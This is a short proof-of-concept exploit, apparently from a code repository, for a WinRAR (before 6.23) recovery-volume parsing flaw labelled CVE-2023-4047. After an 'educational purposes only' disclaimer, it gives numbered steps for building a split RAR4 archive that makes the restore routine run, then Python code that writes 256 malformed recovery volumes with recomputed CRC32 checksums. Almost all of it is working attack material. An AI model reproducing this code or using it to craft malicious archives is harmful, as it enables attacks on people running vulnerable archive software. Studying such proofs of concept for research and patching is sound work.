## CVE-2023-4047 PoC By Wild Pointer // 
## DISCLAIMER: Use at your own responsibility - The publisher, author or any of its affiliates aren't responsible for any actions caused, made or generated by using this code and/or repository.
## This is just & solely for educational purposes and includes demo example only, not to harm or cause any impact. 
## Use this for educational purposes only. Do not use this piece of code for any unethical or unintended behaviour.
'''
1. Using Winrar < 6.23, Create RAR4 Archive with one random file (around 100kb is enough), make it "RAR4" type & Enable "Add recovery record".
2. Choose "split to volumes" - You can put "1024B" (to do many splits, but also some small amounts of splits are enough).
2. In "Advanced" - change recovery record percentage > 20%, also make recovery volumes > 40, also make - "old name style" in recovery volumes.
3. Remove "archive_name.r01" - ie the first volume that has recovery volume - so Restore() will be triggered, i.e: delete "archive_name.r01".
3. Now use the attached code to re-generate malformed "recovery volumes":
'''
import zlib
import struct
ARCHIVE_NAME = 'YOUR_ARCHIVE_NAME_WITHOUT_SUFFIX_HERE' # CHANGE THIS & MAKE SURE YOU ARE IN THE SAME FOLDER AS THE ARCHIVE.

def calculate_crc32(data):
	crc_value = zlib.crc32(data)
	return crc_value & 0xFFFFFFFF

def calc_crc(x):
	res = calculate_crc32(x)
	return struct.pack("<I", res)

# 0. malform .r01 volume
#data = open('%s.r01' % ARCHIVE_NAME, 'rb').read()
#data = data[:0x280] + bytes(0x80) + data[0x300:]
#open('%s.r01' % ARCHIVE_NAME, 'wb').write(data)

# 1. re-generate malformed recovery vols.
data = open('%s01.rev' % ARCHIVE_NAME, 'rb').read()
names = ['%s%s.rev' % (ARCHIVE_NAME, str(i).zfill(2)) for i in range(256)]
datas = [data[:-7] + bytes([0xf0, 0x00, i]) + calc_crc(data[:-7] + bytes([0xf0, 0x00, i])) for i in range(256)]

# 2. overwrite malformed recovery vols.
for i in range(256):
	fname = names[i]
	data = datas[i]
	open(fname, 'wb').write(data)